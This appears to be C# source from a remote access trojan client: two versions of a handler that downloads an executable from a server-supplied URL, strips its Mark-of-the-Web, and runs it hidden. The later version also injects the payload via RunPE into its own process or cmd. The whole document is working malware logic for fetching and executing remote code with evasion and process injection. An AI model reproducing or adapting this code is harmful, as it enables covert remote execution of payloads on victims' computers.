public static void HandleDownloadAndExecuteCommand(Packets.ServerPackets.DownloadAndExecute command, Client client) { new Packets.ClientPackets.Status("Downloading file...").Execute(client); new Thread(() => { string tempFile = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), Helper.Helper.GetRandomFilename(12, ".exe")); try { using (WebClient c = new WebClient()) { c.Proxy = null; c.DownloadFile(command.URL, tempFile); } } catch { new Packets.ClientPackets.Status("Download failed!").Execute(client); return; } new Packets.ClientPackets.Status("Downloaded File!").Execute(client); try { DeleteFile(tempFile + ":Zone.Identifier"); var bytes = File.ReadAllBytes(tempFile); if (bytes[0] != 'M' && bytes[1] != 'Z') { throw new Exception("no pe file"); } ProcessStartInfo startInfo = new ProcessStartInfo(); if (command.RunHidden) { startInfo.WindowStyle = ProcessWindowStyle.Hidden; startInfo.CreateNoWindow = true; } startInfo.UseShellExecute = command.RunHidden; startInfo.FileName = tempFile; Process.Start(startInfo); } catch { DeleteFile(tempFile); new Packets.ClientPackets.Status("Execution failed!").Execute(client); return; } new Packets.ClientPackets.Status("Executed File!").Execute(client); }).Start(); }
public static void HandleDownloadAndExecuteCommand(Packets.ServerPackets.DownloadAndExecute command, Client client) { new Packets.ClientPackets.Status("Downloading file...").Execute(client); new Thread(() => { try { if (command.Type == "drop") { #region drop string tempFile = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), Helper.Helper.GetRandomFilename(12, ".exe")); try { using (WebClient c = new WebClient()) { c.Proxy = null; c.DownloadFile(command.URL, tempFile); } } catch { new Packets.ClientPackets.Status("Download failed!").Execute(client); return; } new Packets.ClientPackets.Status("Downloaded File!").Execute(client); try { DeleteFile(tempFile + ":Zone.Identifier"); var bytes = File.ReadAllBytes(tempFile); if (bytes[0] != 'M' && bytes[1] != 'Z') { throw new Exception("Not an .EXE file!"); } ProcessStartInfo startInfo = new ProcessStartInfo(); if (command.RunHidden) { startInfo.WindowStyle = ProcessWindowStyle.Hidden; startInfo.CreateNoWindow = true; } startInfo.UseShellExecute = command.RunHidden; startInfo.FileName = tempFile; Process.Start(startInfo); } catch (Exception ex) { DeleteFile(tempFile); new Packets.ClientPackets.Status(string.Format("Execution failed: {0}", ex.Message)).Execute(client); return; } #endregion } else if (command.Type == "self") { byte[] fileBytes = Download(command.URL, client); if (fileBytes == null) { new Packets.ClientPackets.Status("Download failed!").Execute(client); } RunPE.Invoke(new string[] { Convert.ToBase64String(fileBytes), "self", "" }, client); } else if (command.Type == "cmd") { byte[] fileBytes = Download(command.URL, client); if (fileBytes == null) { new Packets.ClientPackets.Status("Download failed!").Execute(client); } RunPE.Invoke(new string[] { Convert.ToBase64String(fileBytes), "sys", "cmd" }, client); } else { new Packets.ClientPackets.Status("Unknown Injection Type!").Execute(client); } } catch (Exception ex) { new Packets.ClientPackets.Status(string.Format("Execution failed: {0}", ex.Message)).Execute(client); return; } new Packets.ClientPackets.Status("Executed File!").Execute(client); }).Start(); }